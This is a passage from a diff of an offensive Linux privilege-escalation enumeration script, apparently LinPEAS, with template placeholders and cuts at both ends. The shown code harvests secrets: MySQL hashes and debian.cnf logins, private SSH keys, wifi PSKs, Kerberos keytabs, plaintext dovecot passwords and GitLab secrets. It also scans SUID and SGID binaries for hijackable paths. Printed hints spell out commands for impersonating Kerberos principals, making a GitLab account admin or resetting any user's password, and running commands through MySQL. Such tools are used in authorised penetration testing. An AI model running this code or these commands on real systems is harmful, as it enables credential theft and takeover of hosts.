- echo "Yes" | sed -${E} "s,.*,${SED_RED},"
- mysql -u root -e "SELECT User,Host,authentication_string FROM mysql.user;" 2>/dev/null | sed -${E} "s,.*,${SED_RED},"
- else echo_no
- fi
-
- #-- SI) Mysql credentials
- print_2title "Searching mysql credentials and exec"
- if [ "$PSTORAGE_MYSQL" ]; then
- printf "%s\n" "$PSTORAGE_MYSQL" | while read d; do
- for f in $(find $d -name debian.cnf 2>/dev/null); do
- if [ -r "$f" ]; then
- echo "We can read the mysql debian.cnf. You can use this username/password to log in MySQL" | sed -${E} "s,.*,${SED_RED},"
- cat "$f"
- fi
- done
- for f in $(find $d -name user.MYD 2>/dev/null); do
- if [ -r "$f" ]; then
- echo "We can read the Mysql Hashes from $f" | sed -${E} "s,.*,${SED_RED},"
- grep -oaE "[-_\.\*a-Z0-9]{3,}" $f | grep -v "mysql_native_password"
- fi
- done
- for f in $(grep -lr "user\s*=" $d 2>/dev/null | grep -v "debian.cnf"); do
- if [ -r "$f" ]; then
- u=$(cat "$f" | grep -v "#" | grep "user" | grep "=" 2>/dev/null)
- echo "From '$f' Mysql user: $u" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},"
- fi
- done
- for f in $(find $d -name my.cnf 2>/dev/null); do
- if [ -r "$f" ]; then
- echo "Found readable $f"
- grep -v "^#" "$f" | grep -Ev "\W+\#|^#" 2>/dev/null | grep -Iv "^$" | sed "s,password.*,${SED_RED},"
- fi
- done
- mysqlexec=$(whereis lib_mysqludf_sys.so 2>/dev/null | grep "lib_mysqludf_sys\.so")
- if [ "$mysqlexec" ]; then
- echo "Found $mysqlexec"
- echo "If you can login in MySQL you can execute commands doing: SELECT sys_eval('id');" | sed -${E} "s,.*,${SED_RED},"
- fi
- done
- else echo_not_found
- fi
- echo ""
-
- peass{MariaDB}
-
- peass{PostgreSQL}
-
- #-- SI) PostgreSQL brute
- if [ "$TIMEOUT" ]; then # In some OS (like OpenBSD) it will expect the password from console and will pause the script.
Also, this OS doesn't have the "timeout" command so lets only use this checks in OS that has it.
- #checks to see if any postgres password exists and connects to DB 'template0' - following commands are a variant on this
- print_list "PostgreSQL connection to template0 using postgres/NOPASS ........ "
- if [ "$(timeout 1 psql -U postgres -d template0 -c 'select version()' 2>/dev/null)" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED},"
- else echo_no
- fi
-
- print_list "PostgreSQL connection to template1 using postgres/NOPASS ........ "
- if [ "$(timeout 1 psql -U postgres -d template1 -c 'select version()' 2>/dev/null)" ]; then echo "Yes" | sed "s,.)*,${SED_RED},"
- else echo_no
- fi
-
- print_list "PostgreSQL connection to template0 using pgsql/NOPASS ........... "
- if [ "$(timeout 1 psql -U pgsql -d template0 -c 'select version()' 2>/dev/null)" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED},"
- else echo_no
- fi
-
- print_list "PostgreSQL connection to template1 using pgsql/NOPASS ...........
"
- if [ "$(timeout 1 psql -U pgsql -d template1 -c 'select version()' 2> /dev/null)" ]; then echo "Yes" | sed -${E} "s,.*,${SED_RED},"
- else echo_no
- fi
- echo ""
- fi
-
- peass{Mongo}
-
- peass{Apache}
-
- peass{Tomcat}
-
- peass{FastCGI}
-
- peass{Http_conf}
-
- peass{Htpasswd}
-
- peass{PHP Sessions}
-
- peass{Wordpress}
-
- peass{Drupal}
-
- peass{Moodle}
-
- peass{Supervisord}
-
- peass{Cesi}
-
- peass{Rsync}
-
- peass{Hostapd}
-
- #-- SI) Wifi conns
- print_2title "Searching wifi conns file"
- wifi=$(find /etc/NetworkManager/system-connections/ -type f 2>/dev/null)
- if [ "$wifi" ]; then
- printf "%s\n" "$wifi" | while read f; do echo "$f"; cat "$f" 2>/dev/null | grep "psk.*=" | sed "s,psk.*,${SED_RED},"; done
- else echo_not_found
- fi
- echo ""
-
- peass{Anaconda ks}
-
- peass{VNC}
-
- peass{Ldap}
-
- peass{OpenVPN}
-
- #-- SI) ssh files
- print_2title "Searching ssl/ssh files"
- if [ "$PSTORAGE_CERTSB4" ]; then certsb4_grep=$(grep -L "\"\|'\|(" $PSTORAGE_CERTSB4 2>/dev/null); fi
- sshconfig="$(ls /etc/ssh/ssh_config 2>/dev/null)"
- hostsdenied="$(ls /etc/hosts.denied 2>/dev/null)"
- hostsallow="$(ls /etc/hosts.allow 2>/dev/null)"
-
- peass{SSH}
-
- grep "PermitRootLogin \|ChallengeResponseAuthentication \|PasswordAuthentication \|UsePAM \|Port\|PermitEmptyPasswords\|PubkeyAuthentication\|ListenAddress\|ForwardAgent\|AllowAgentForwarding\|AuthorizedKeysFiles" /etc/ssh/sshd_config 2>/dev/null | grep -v "#" | sed -${E} "s,PermitRootLogin.*es|PermitEmptyPasswords.*es|ChallengeResponseAuthentication.*es|FordwardAgent.*es,${SED_RED},"
-
- if [ "$TIMEOUT" ]; then
- privatekeyfilesetc=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null)
- privatekeyfileshome=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' $HOMESEARCH 2>/dev/null)
- privatekeyfilesroot=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /root 2>/dev/null)
- privatekeyfilesmnt=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE
KEY.*\-\-\-\-\-' /mnt 2>/dev/null)
- else
- privatekeyfilesetc=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null) #If there is tons of files linpeas gets frozen here without a timeout
- privatekeyfileshome=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' $HOME/.ssh 2>/dev/null)
- fi
-
- if [ "$privatekeyfilesetc" ] || [ "$privatekeyfileshome" ] || [ "$privatekeyfilesroot" ] || [ "$privatekeyfilesmnt" ] ; then
- echo ""
- print_3title "Possible private SSH keys were found!" | sed -${E} "s,private SSH keys,${SED_RED},"
- if [ "$privatekeyfilesetc" ]; then printf "$privatekeyfilesetc\n" | sed -${E} "s,.*,${SED_RED},"; fi
- if [ "$privatekeyfileshome" ]; then printf "$privatekeyfileshome\n" | sed -${E} "s,.*,${SED_RED},"; fi
- if [ "$privatekeyfilesroot" ]; then printf "$privatekeyfilesroot\n" | sed -${E} "s,.*,${SED_RED},"; fi
- if [ "$privatekeyfilesmnt" ]; then printf "$privatekeyfilesmnt\n" | sed -${E} "s,.*,${SED_RED},"; fi
- echo ""
- fi
- if [ "$certsb4_grep" ] || [ "$PSTORAGE_CERTSBIN" ]; then
- print_3title "Some certificates were found (out limited):"
- printf "$certsb4_grep\n" | head -n 20
- printf "$$PSTORAGE_CERTSBIN\n" | head -n 20
- echo ""
- fi
- if [ "$PSTORAGE_CERTSCLIENT" ]; then
- print_3title "Some client certificates were found:"
- printf "$PSTORAGE_CERTSCLIENT\n"
- echo ""
- fi
- if [ "$PSTORAGE_SSH_AGENTS" ]; then
- print_3title "Some SSH Agent files were found:"
- printf "$PSTORAGE_SSH_AGENTS\n"
- echo ""
- fi
- if ssh-add -l 2>/dev/null | grep -qv 'no identities'; then
- print_3title "Listing SSH Agents"
- ssh-add -l
- echo ""
- fi
- if [ "$PSTORAGE_SSH_CONFIG" ]; then
- print_3title "Some home ssh config file was found"
- printf "%s\n" "$PSTORAGE_SSH_CONFIG" | while read f; do ls "$f" | sed -${E} "s,$f,${SED_RED},"; cat "$f" 2>/dev/null | grep -Iv "^$" | grep -v "^#" | sed -${E} "s,User|ProxyCommand,${SED_RED},"; done
- echo ""
- fi
- if [ "$hostsdenied" ]; then
- print_3title "/etc/hosts.denied file found, read
the rules:"
- printf "$hostsdenied\n"
- cat "/etc/hosts.denied" 2>/dev/null | grep -v "#" | grep -Iv "^$" | sed -${E} "s,.*,${SED_GREEN},"
- echo ""
- fi
- if [ "$hostsallow" ]; then
- print_3title "/etc/hosts.allow file found, trying to read the rules:"
- printf "$hostsallow\n"
- cat "/etc/hosts.allow" 2>/dev/null | grep -v "#" | grep -Iv "^$" | sed -${E} "s,.*,${SED_RED},"
- echo ""
- fi
- if [ "$sshconfig" ]; then
- echo ""
- echo "Searching inside /etc/ssh/ssh_config for interesting info"
- grep -v "^#" /etc/ssh/ssh_config 2>/dev/null | grep -Ev "\W+\#|^#" 2>/dev/null | grep -Iv "^$" | sed -${E} "s,Host|ForwardAgent|User|ProxyCommand,${SED_RED},"
- fi
- echo ""
-
- #-- SI) PAM auth
- print_2title "Searching unexpected auth lines in /etc/pam.d/sshd"
- pamssh=$(grep -v "^#\|^@" /etc/pam.d/sshd 2>/dev/null | grep -i auth)
- if [ "$pamssh" ]; then
- grep -v "^#\|^@" /etc/pam.d/sshd 2>/dev/null | grep -i auth | sed -${E} "s,.*,${SED_RED},"
- else echo_no
- fi
- echo ""
-
- #-- SI) NFS exports
- print_2title "NFS exports?"
- print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe"
- if [ "$(cat /etc/exports 2>/dev/null)" ]; then grep -v "^#" /etc/exports 2>/dev/null | grep -Ev "\W+\#|^#" 2>/dev/null | sed -${E} "s,no_root_squash|no_all_squash ,${SED_RED_YELLOW}," | sed -${E} "s,insecure,${SED_RED},"
- else echo_not_found "/etc/exports"
- fi
- echo ""
-
- #-- SI) Kerberos
- print_2title "Searching kerberos conf files and tickets"
- print_info "http://book.hacktricks.xyz/linux-unix/privilege-escalation/linux-active-directory"
- kadmin_exists="$(command -v kadmin)"
- klist_exists="$(command -v klist)"
- if [ "$kadmin_exists" ]; then echo "kadmin was found on $kadmin_exists" | sed "s,$kadmin_exists,${SED_RED},"; fi
- if [ "$klist_exists" ] && [ -x "$klist_exists" ]; then echo "klist execution"; klist; fi
- ptrace_scope="$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null)"
- if [ "$ptrace_scope" ] && [ "$ptrace_scope" -eq 0 ]; then echo "ptrace protection is disabled (0), you might find tickets inside processes memory" | sed "s,is disabled,${SED_RED},g";
- else echo "ptrace protection is enabled ($ptrace_scope), you need to disable it to search for tickets inside processes memory" | sed "s,is enabled,${SED_GREEN},g";
- fi
-
- printf "%s\n" "$PSTORAGE_KERBEROS" | while read f; do
- if [ -r "$f" ]; then
- if echo "$f" | grep -q .k5login; then
- echo ".k5login file (users with access to the user who has this file in his home)"
- cat "$f" 2>/dev/null | sed -${E} "s,.*,${SED_RED},g"
- elif echo "$f" | grep -q keytab; then
- echo ""
- echo "keytab file found, you may be able to impersonate some kerberos principals and add users or modify passwords"
- klist -k "$f" 2>/dev/null | sed -${E} "s,.*,${SED_RED},g"
- printf "$(klist -k $f 2>/dev/null)\n" | awk '{print $2}' | while read l; do
- if [ "$l" ] && echo "$l" | grep -q "@"; then
- printf "$ITALIC --- Impersonation command: ${NC}kadmin -k -t /etc/krb5.keytab -p \"$l\"\n" | sed -${E}
"s,$l,${SED_RED},g"
- #kadmin -k -t /etc/krb5.keytab -p "$l" -q getprivs 2>/dev/null #This should show the permissions of each impersoanted user, the thing is that in a test it showed that every user had the same permissions (even if they didn't). So this test isn't valid
- #We could also try to create a new user or modify a password, but I'm not user if linpeas should do that
- fi
- done
- elif echo "$f" | grep -q krb5.conf; then
- ls -l "$f"
- cat "$f" 2>/dev/null | sed -${E} "s,default_ccache_name,${SED_RED},";
- elif echo "$f" | grep -q kadm5.acl; then
- ls -l "$f"
- cat "$f" 2>/dev/null
- elif echo "$f" | grep -q sssd.conf; then
- ls -l "$f"
- cat "$f" 2>/dev/null | sed -${E} "s,cache_credentials ?= ?[tT][rR][uU][eE],${SED_RED},";
- elif echo "$f" | grep -q secrets.ldb; then
- echo "You could use SSSDKCMExtractor to extract the tickets stored here" | sed -${E} "s,SSSDKCMExtractor,${SED_RED},";
- ls -l "$f"
- elif echo "$f" | grep -q .secrets.mkey; then
- echo "This is the secrets file to use with SSSDKCMExtractor" | sed -${E} "s,SSSDKCMExtractor,${SED_RED},";
- ls -l "$f"
- fi
- fi
- done
- ls -l "/tmp/krb5cc*" "/var/lib/sss/db/ccache_*" "/etc/opt/quest/vas/host.keytab" 2>/dev/null || echo_not_found "tickets kerberos"
- klist 2>/dev/null || echo_not_found "klist"
- echo ""
-
- peass{Knockd}
-
- peass{Kibana}
-
- peass{Elasticsearch}
-
- ##-- SI) Logstash
- print_2title "Searching logstash files"
- if [ "$PSTORAGE_LOGSTASH" ]; then
- printf "$PSTORAGE_LOGSTASH\n"
- printf "%s\n" "$PSTORAGE_LOGSTASH" | while read d; do
- if [ -r "$d/startup.options" ]; then
- echo "Logstash is running as user:"
- cat "$d/startup.options" 2>/dev/null | grep "LS_USER\|LS_GROUP" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed -${E} "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,root,${SED_RED},"
- fi
- cat "$d/conf.d/out*" | grep "exec\s*{\|command\s*=>" | sed -${E}
"s,exec\W*\{|command\W*=>,${SED_RED},"
- cat "$d/conf.d/filt*" | grep "path\s*=>\|code\s*=>\|ruby\s*{" | sed -${E} "s,path\W*=>|code\W*=>|ruby\W*\{,${SED_RED},"
- done
- else echo_not_found
- fi
- echo ""
-
- #-- SI) Vault-ssh
- print_2title "Searching Vault-ssh files"
- if [ "$PSTORAGE_VAULT_SSH_HELPER" ]; then
- printf "$PSTORAGE_VAULT_SSH_HELPER\n"
- printf "%s\n" "$PSTORAGE_VAULT_SSH_HELPER" | while read f; do cat "$f" 2>/dev/null; vault-ssh-helper -verify-only -config "$f" 2>/dev/null; done
- echo ""
- vault secrets list 2>/dev/null
- printf "%s\n" "$PSTORAGE_VAULT_SSH_TOKEN" | sed -${E} "s,.*,${SED_RED}," 2>/dev/null
- else echo_not_found "vault-ssh-helper.hcl"
- fi
- echo ""
-
- #-- SI) Cached AD Hashes
- adhashes=$(ls "/var/lib/samba/private/secrets.tdb" "/var/lib/samba/passdb.tdb" "/var/opt/quest/vas/authcache/vas_auth.vdb" "/var/lib/sss/db/cache_*" 2>/dev/null)
- print_2title "Searching AD cached hashes"
- if [ "$adhashes" ]; then
- ls -l "/var/lib/samba/private/secrets.tdb" "/var/lib/samba/passdb.tdb" "/var/opt/quest/vas/authcache/vas_auth.vdb" "/var/lib/sss/db/cache_*" 2>/dev/null
- else echo_not_found "cached hashes"
- fi
- echo ""
-
- #-- SI) Screen sessions
- print_2title "Searching screen sessions"
- print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions"
- screensess=$(screen -ls 2>/dev/null)
- if [ "$screensess" ]; then
- printf "$screensess" | sed -${E} "s,.*,${SED_RED}," | sed -${E} "s,No Sockets found.*,${C}[32m&${C}[0m,"
- else echo_not_found "screen"
- fi
- echo ""
-
- #-- SI) Tmux sessions
- tmuxdefsess=$(tmux ls 2>/dev/null)
- tmuxnondefsess=$(ps auxwww | grep "tmux " | grep -v grep)
- print_2title "Searching tmux sessions"$N
- print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-shell-sessions"
- if [ "$tmuxdefsess" ] || [ "$tmuxnondefsess" ]; then
- printf "$tmuxdefsess\n$tmuxnondefsess\n" | sed -${E} "s,.*,${SED_RED}," | sed -${E} "s,no server running on.*,${C}[32m&${C}[0m,"
-
else echo_not_found "tmux"
- fi
- echo ""
-
- peass{CouchDB}
-
- peass{Redis}
-
- #-- SI) Dovecot
- # Needs testing
- print_2title "Searching dovecot files"
- dovecotpass=$(grep -r "PLAIN" /etc/dovecot 2>/dev/null)
- if [ -z "$dovecotpass" ]; then
- echo_not_found "dovecot credentials"
- else
- for d in $(grep -r "PLAIN" /etc/dovecot 2>/dev/null); do
- df=$(echo $d |cut -d ':' -f1)
- dp=$(echo $d |cut -d ':' -f2-)
- echo "Found possible PLAIN text creds in $df"
- echo "$dp" | sed -${E} "s,.*,${SED_RED}," 2>/dev/null
- done
- fi
- echo ""
-
- peass{Mosquitto}
-
- peass{Neo4j}
-
- peass{Cloud Credentials}
-
- peass{Cloud Init}
-
- peass{CloudFlare}
-
- peass{Erlang}
-
- peass{GMV Auth}
-
- peass{IPSec}
-
- peass{IRSSI}
-
- peass{Keyring}
-
- peass{Filezilla}
-
- peass{Backup Manager}
-
- ##-- SI) passwd files (splunk)
- print_2title "Searching uncommon passwd files (splunk)"
- SPLUNK_BIN="$(command -v splunk 2>/dev/null)"
- if [ "$SPLUNK_BIN" ]; then echo "splunk binary was found installed on $SPLUNK_BIN" | sed "s,.*,${SED_RED},"; fi
- printf "%s\n" "$PSTORAGE_SPLUNK" | sort | uniq | while read f; do
- if [ -f "$f" ] && ! [ -x "$f" ]; then
- echo "passwd file: $f" | sed "s,$f,${SED_RED},"
- cat "$f" 2>/dev/null | grep "'pass'|'password'|'user'|'database'|'host'|\$" | sed -${E} "s,password|pass|user|database|host|\$,${SED_RED},"
- fi
- done
- echo ""
-
- print_2title "Analyzing kcpassword files"
- print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#kcpassword"
- printf "%s\n" "$PSTORAGE_KCPASSWORD\n" | while read f; do
- echo "$f" | sed -${E} "s,.*,${SED_RED},"
- base64 "$f" 2>/dev/null | sed -${E} "s,.*,${SED_RED},"
- done
- echo ""
-
- ##-- SI) Gitlab
- print_2title "Searching GitLab related files"
- #Check gitlab-rails
- if [ "$(command -v gitlab-rails)" ]; then
- echo "gitlab-rails was found. Trying to dump users..."
- gitlab-rails runner 'User.where.not(username: "peasssssssss").each { |u| pp u.attributes }' | sed -${E} "s,email|password,${SED_RED},"
- echo "If you have enough privileges, you can make an account under your control administrator by running: gitlab-rails runner 'user = User.find_by(email: \"youruser@example.com\"); user.admin = TRUE; user.save!'"
- echo "Alternatively, you could change the password of any user by running: gitlab-rails runner 'user = User.find_by(email: \"admin@example.com\"); user.password = \"pass_peass_pass\"; user.password_confirmation = \"pass_peass_pass\"; user.save!'"
- echo ""
- fi
- if [ "$(command -v gitlab-backup)" ]; then
- echo "If you have enough privileges, you can create a backup of all the repositories inside gitlab using 'gitlab-backup create'"
- echo "Then you can get the plain-text with something like 'git clone \@hashed/19/23/14348274[...]38749234.bundle'"
- echo ""
- fi
- #Check gitlab files
- printf "%s\n" "$PSTORAGE_GITLAB" | sort | uniq | while read f; do
- if echo $f | grep -q secrets.yml; then
- echo "Found $f" | sed "s,$f,${SED_RED},"
- cat "$f" 2>/dev/null | grep -Iv "^$" | grep -v "^#"
- elif echo $f | grep -q gitlab.yml; then
- echo "Found $f" | sed "s,$f,${SED_RED},"
- cat "$f" | grep -A 4 "repositories:"
- elif echo $f | grep -q gitlab.rb; then
- echo "Found $f" | sed "s,$f,${SED_RED},"
- cat "$f" | grep -Iv "^$" | grep -v "^#" | sed -${E} "s,email|user|password,${SED_RED},"
- fi
- echo ""
- done
- echo ""
-
- peass{Github}
-
- peass{Svn}
-
- peass{PGP-GPG}
-
- peass{Cache Vi}
-
- peass{Wget}
-
- ##-- SI) containerd installed
- print_2title "Checking if containerd(ctr) is available"
- print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/containerd-ctr-privilege-escalation"
- containerd=$(command -v ctr)
- if [ "$containerd" ]; then
- echo "ctr was found in $containerd, you may be able to escalate privileges with it" | sed -${E} "s,.*,${SED_RED},"
- ctr image list
- fi
- echo ""
-
- ##-- SI) runc
installed
- print_2title "Checking if runc is available"
- print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/runc-privilege-escalation"
- runc=$(command -v runc)
- if [ "$runc" ]; then
- echo "runc was found in $runc, you may be able to escalate privileges with it" | sed -${E} "s,.*,${SED_RED},"
- fi
- echo ""
-
- #-- SI) Docker
- print_2title "Searching docker files (limit 70)"
- print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket"
- printf "%s\n" "$PSTORAGE_DOCKER" | head -n 70 | while read f; do
- ls -l "$f" 2>/dev/null
- if ! [ "$IAMROOT" ] && [ -S "$f" ] && [ -w "$f" ]; then
- echo "Docker socket file ($f) is writable" | sed -${E} "s,.*,${SED_RED_YELLOW},"
- fi
- done
- echo ""
-
- peass{Firefox}
-
- peass{Chrome}
-
- peass{Autologin}
-
- #-- SI) S/Key athentication
- print_2title "S/Key authentication"
- if grep auth= /etc/login.conf 2>/dev/null | grep -v \"^#\" | grep -q skey; then
- printf "System supports$RED S/Key$NC authentication\n"
- if ! [ -d /etc/skey/ ]; then
- echo "${GREEN}S/Key authentication enabled, but has not been initialized"
- elif ! [ "$IAMROOT" ] && [ -w /etc/skey/ ]; then
- echo "${RED}/etc/skey/ is writable by you"
- ls -ld /etc/skey/
- else
- ls -ld /etc/skey/ 2>/dev/null
- fi
- fi
- echo ""
-
- #-- SI) YubiKey athentication
- print_2title "YubiKey authentication"
- if grep auth= /etc/login.conf 2>/dev/null | grep -v \"^#\" | grep -q yubikey; then
- printf "System supports$RED YubiKey$NC authentication\n"
- if !
[ "$IAMROOT" ] && [ -w /var/db/yubikey/ ]; then
- echo "${RED}/var/db/yubikey/ is writable by you"
- ls -ld /var/db/yubikey/
- else
- ls -ld /var/db/yubikey/ 2>/dev/null
- fi
- fi
- echo ""
-
- #-- SI) Passwords inside pam.d
- print_2title "Passwords inside pam.d"
- grep -Ri "passwd" /etc/pam.d/ 2>/dev/null | grep -v ":#" | sed "s,passwd,${SED_RED},"
- echo ""
-
-
-
- peass{SNMP}
-
- peass{Pypirc}
-
- peass{Postfix}
-
- peass{Ldaprc}
-
- peass{Env}
-
- peass{Msmtprc}
-
- peass{Keepass}
-
- peass{FTP}
-
- peass{EXTRA_SECTIONS}
-
- peass{Interesting logs}
-
- peass{Windows Files}
-
- peass{Other Interesting Files}
-
- echo ""
-
- if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi
-fi
-
-
-if echo $CHECKS | grep -q IntFiles; then
- ###########################################
- #----------) Interesting files (----------#
- ###########################################
- print_title "Interesting Files"
-
- ##-- IF) SUID
- print_2title "SUID - Check easy privesc, exploits and write perms"
- print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid"
- if ! [ "$STRINGS" ]; then
- echo_not_found "strings"
- fi
- if ! [ "$STRACE" ]; then
- echo_not_found "strace"
- fi
- suids_files=$(find / -perm -4000 -type f ! -path "/dev/*" 2>/dev/null)
- for s in $suids_files; do
- s=$(ls -lahtr "$s")
- #If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder
- if echo "$s" | grep -qE "^total"; then break; fi
-
- sname="$(echo $s | awk '{print $9}')"
- if [ "$sname" = "." ] || [ "$sname" = ".." ]; then
- true #Don't do nothing
- elif ! [ "$IAMROOT" ] && [ -O "$sname" ]; then
- echo "You own the SUID file: $sname" | sed -${E} "s,.*,${SED_RED},"
- elif !
[ "$IAMROOT" ] && [ -w "$sname" ]; then #If write permision, win found (no check exploits)
- echo "You can write SUID file: $sname" | sed -${E} "s,.*,${SED_RED_YELLOW},"
- else
- c="a"
- for b in $sidB; do
- if echo $s | grep -q $(echo $b | cut -d % -f 1); then
- echo "$s" | sed -${E} "s,$(echo $b | cut -d % -f 1),${C}[1;31m& ---> $(echo $b | cut -d % -f 2)${C}[0m,"
- c=""
- break;
- fi
- done;
- if [ "$c" ]; then
- if echo "$s" | grep -qE "$sidG1" || echo "$s" | grep -qE "$sidG2" || echo "$s" | grep -qE "$sidG3" || echo "$s" | grep -qE "$sidG4" || echo "$s" | grep -qE "$sidVB" || echo "$s" | grep -qE "$sidVB2"; then
- echo "$s" | sed -${E} "s,$sidG1,${SED_GREEN}," | sed -${E} "s,$sidG2,${SED_GREEN}," | sed -${E} "s,$sidG3,${SED_GREEN}," | sed -${E} "s,$sidG4,${SED_GREEN}," | sed -${E} "s,$sidVB,${SED_RED_YELLOW}," | sed -${E} "s,$sidVB2,${SED_RED_YELLOW},"
- else
- echo "$s (Unknown SUID binary)" | sed -${E} "s,/.*,${SED_RED},"
- printf $ITALIC
- if ! [ "$FAST" ] && [ "$STRINGS" ]; then
- $STRINGS "$sname" 2>/dev/null | sort | uniq | while read sline; do
- sline_first="$(echo "$sline" | cut -d ' ' -f1)"
- if echo "$sline_first" | grep -qEv "$cfuncs"; then
- if echo "$sline_first" | grep -q "/" && [ -f "$sline_first" ]; then #If a path
- if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then #And modifiable
- printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can modify it (strings line: $sline) (https://tinyurl.com/suidpath)\n"
- fi
- else #If not a path
- if [ ${#sline_first} -gt 2 ] && command -v "$sline_first" 2>/dev/null | grep -q '/' && echo "$sline_first" | grep -Eqv "\.\."; then #Check if existing binary
- printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is executing $RED$sline_first$NC$ITALIC and you can impersonate it (strings line: $sline) (https://tinyurl.com/suidpath)\n"
- fi
- fi
- fi
- done
- if ! [ "$FAST" ] && [ "$TIMEOUT" ] && [ "$STRACE" ] && !
[ "$NOTEXPORT" ] && [ -x "$sname" ]; then
- printf $ITALIC
- echo "----------------------------------------------------------------------------------------"
- echo " --- Trying to execute $sname with strace in order to look for hijackable libraries..."
- OLD_LD_LIBRARY_PATH=$LD_LIBRARY_PATH
- export LD_LIBRARY_PATH=""
- timeout 2 "$STRACE" "$sname" 2>&1 | grep -i -E "open|access|no such file" | sed -${E} "s,open|access|No such file,${SED_RED}$ITALIC,g"
- printf $NC
- export LD_LIBRARY_PATH=$OLD_LD_LIBRARY_PATH
- echo "----------------------------------------------------------------------------------------"
- echo ""
- fi
- fi
- fi
- fi
- fi
- done;
- echo ""
-
-
- ##-- IF) SGID
- print_2title "SGID"
- print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid"
- sgids_files=$(find / -perm -2000 -type f ! -path "/dev/*" 2>/dev/null)
- for s in $sgids_files; do
- s=$(ls -lahtr "$s")
- #If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder
- if echo "$s" | grep -qE "^total";then break; fi
-
- sname="$(echo $s | awk '{print $9}')"
- if [ "$sname" = "." ] || [ "$sname" = ".." ]; then
- true #Don't do nothing
- elif ! [ "$IAMROOT" ] && [ -O "$sname" ]; then
- echo "You own the SGID file: $sname" | sed -${E} "s,.*,${SED_RED},"
- elif !
[ "$IAMROOT" ] && [ -w "$sname" ]; then #If write permision, win found (no check exploits) - echo "You can write SGID file: $sname" | sed -${E} "s,.*,${SED_RED_YELLOW}," - else - c="a" - for b in $sidB; do - if echo "$s" | grep -q $(echo $b | cut -d % -f 1); then - echo "$s" | sed -${E} "s,$(echo $b | cut -d % -f 1),${C}[1;31m& ---> $(echo $b | cut -d % -f 2)${C}[0m," - c="" - break; - fi - done; - if [ "$c" ]; then - if echo "$s" | grep -qE "$sidG1" || echo "$s" | grep -qE "$sidG2" || echo "$s" | grep -qE "$sidG3" || echo "$s" | grep -qE "$sidG4" || echo "$s" | grep -qE "$sidVB" || echo "$s" | grep -qE "$sidVB2"; then - echo "$s" | sed -${E} "s,$sidG1,${SED_GREEN}," | sed -${E} "s,$sidG2,${SED_GREEN}," | sed -${E} "s,$sidG3,${SED_GREEN}," | sed -${E} "s,$sidG4,${SED_GREEN}," | sed -${E} "s,$sidVB,${SED_RED_YELLOW}," | sed -${E} "s,$sidVB2,${SED_RED_YELLOW}," - else - echo "$s (Unknown SGID binary)" | sed -${E} "s,/.*,${SED_RED}," - printf $ITALIC - if ! [ "$FAST" ] && [ "$STRINGS" ]; then - $STRINGS "$sname" | sort | uniq | while read sline; do - sline_first="$(echo $sline | cut -d ' ' -f1)" - if echo "$sline_first" | grep -qEv "$cfuncs"; then - if echo "$sline_first" | grep -q "/" && [ -f "$sline_first" ]; then #If a path - if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then #And modifiable - printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can modify it (strings line: $sline)\n" - fi - else #If not a path - if [ ${#sline_first} -gt 2 ] && command -v "$sline_first" 2>/dev/null | grep -q '/'; then #Check if existing binary - printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is executing $RED$sline_first$NC$ITALIC and you can impersonate it (strings line: $sline)\n" - fi - fi - fi - done - if ! [ "$FAST" ] && [ "$TIMEOUT" ] && [ "$STRACE" ] && [ ! "$SUPERFAST" ]; then - printf "$ITALIC" - echo " --- Trying to execute $sname with strace in order to look for hijackable libraries..." 
